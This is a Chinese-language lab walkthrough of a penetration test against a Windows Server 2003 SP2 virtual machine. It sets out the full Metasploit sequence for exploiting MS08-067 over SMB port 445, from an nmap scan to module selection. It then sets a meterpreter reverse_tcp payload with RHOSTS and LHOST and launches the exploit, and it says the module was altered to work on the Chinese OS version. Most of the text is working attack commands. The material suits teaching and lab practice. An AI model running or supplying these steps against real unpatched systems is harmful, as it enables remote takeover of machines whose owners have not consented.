靶機(目標機) IP:192.168.108.130
攻擊機Kali 2020.2 IP:192.168.108.131
一:先用Kali機器的nmap工具掃描下目標機器IP再說
nmap -A 192.168.108.130
/*Nmap信息收集看到開放了80 135 139 445 1025端口,並且操作系統Windows server 2003 sp2中文版; 目標開放445端口,可能存在ms08_067漏洞。*/
/*分析下,看到有個445端口,而且是windows 2003 Server Pack2 系統, 我們知道有個著名的漏洞MS08_067 是著名的遠程溢出漏洞,影響除Windows Server 2008 Core以外的所有Windows系統,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各個版本,甚至還包括測試階段的Windows 7 Pro-Beta。本次實驗就是metasploit利用ms08_067漏洞對win2000虛擬機進行滲透測試。MS08_067是一個在windows 445號端口上的漏洞,需要事先查看該端口是否開放,這里使用“nmap -PS 靶機ip”語句發現445號端口開放。因此可以使用MS08_067漏洞進行exploit。*/
二:利用MS08_067 漏洞滲透
MSF更新,使用命令msfupdate進行更新,發現系統提示該命令已不再支持,需使用命令apt update; apt install metasploit-framework進行更新。
root@kali:~# msfupdate
msfupdate is no longer supported when Metasploit is part of the operating system. Please use 'apt update; apt install metasploit-framework'
root@kali:~# apt update
root@kali:~# apt install metasploit-framework
1:打開神器metasploit,並搜索 ms08-067 的漏洞模塊
root@kali:~# msfconsole #啟動metasploit
msf5 > search ms08_067 #搜索 ms08_067 相關漏洞模塊
2.使用搜索到的模塊exploit/windows/smb/ms08_067_netapi
msf5 > use exploit/windows/smb/ms08_067_netapi #使用 exploit/windows/smb/ms08_067_netapi 該漏洞模塊
3.設置payload
msf5 exploit(windows/smb/ms08_067_netapi) > show payloads #輸入命令show payload會顯示出有效的攻擊載荷我們找到一個shell_reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp #使用 windows/meterpreter/reverse_tcp 設置攻擊有效載荷
4.查看被攻擊的機器類型
msf5 exploit(windows/smb/ms08_067_netapi) > show targets #show targets會顯示出可以被攻擊的靶機的操作系統型號
/*這里會列出很多可以被攻擊的主機的類型,由於這里我們的目標機器類型是windows 2003 server sp2,那么我們使用 set target 63(選擇Windows 2003 SP2 English)精確定位被攻擊的目標主機系統是windows 2003 server sp2*/
5.設置被攻擊的機器類型
msf5 exploit(windows/smb/ms08_067_netapi) > set target 63 #set target 63(選擇Windows 2003 SP2 English)
6.設置靶機(目標機)ip
msf5 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.108.130 #設置目標機器IP
7.設置Kaili 機器的ip,set LHOST 192.168.108.131
msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.108.131
8.查看需要設置的參數,show options(可以看到我們所有的設置都已經准備就緒)
9.開始攻擊
msf5 exploit(windows/smb/ms08_067_netapi) > exploit
/* 嘗試使用MSF的攻擊模塊ms08_067_netapi.rb進行攻擊,試了幾遍之后沒成功。根據返回的信息知道目標是windows server 2003中文版,然后切換到已下目錄:/usr/share/metasploit-framework/modules/exploits/windows/smb找到ms08_067_netapi.rb文件,仔細看了一遍果然沒有關於中文版的攻擊代碼。於是找度娘,最后借鑒這篇文章,https://www.cnblogs.com/panisme/p/9222327.html 對攻擊模塊稍作修改。才成功。*/